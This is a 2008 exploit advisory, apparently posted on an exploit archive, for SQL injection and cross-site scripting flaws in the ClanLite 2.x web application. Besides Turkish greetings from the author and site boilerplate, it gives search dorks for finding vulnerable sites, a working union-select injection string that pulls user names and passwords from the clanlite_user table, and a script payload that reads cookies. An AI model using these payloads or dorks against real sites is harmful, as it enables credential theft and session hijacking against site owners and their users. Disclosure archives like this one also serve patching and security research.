ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities

2008-11-24 / 2008-11-25
Credit: ZoRLu
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-5214 | CVE-2008-5215
CWE: CWE-79
CWE-89

########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ############################## ClanLite V2 SQL inj. & XSS dork: Cr&#195;&#169;&#195;&#169; par Narfight, ClanLite V2.2006.05.20 &#169; 2000-2005 dork: Themed By Ray &#169; 2003, 2004 iOptional readme script /**************************************************************************** * Fichier : * * Copyright : (C) 2004 ClanLite V2 * * Email : support@clanlite.org * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * ***************************************************************************/ author: ZoRLu home: ( yildirimordulari.org ) ( z0rlu.ownspace.org ) ( milw0rm.org ) ( r00tsecurity.org ) ( securityfocus.com ) contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn ) Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da :(( Not: http://www.z0rlu.ownspace.org acIklarIn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :)) ########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ############################## http://localhost/clanlite_path/service/profil.php?link=[SQL] [SQL]= ZoRLu'/**/union/**/select/**/null,null,mail,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,0x3a,psw),null,null,null/**/from/**/clanlite_user/* [XSS]= http://localhost/clanlite/service/calendrier.php?mois=6&annee="><script>alert(document.cookie)</script> ########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ############################## thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, bLaCk, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m, avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :)) ) Efsane: YILDIRIMORDULARI.ORG Dersler BasladI Sanal Bitti :((( ########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top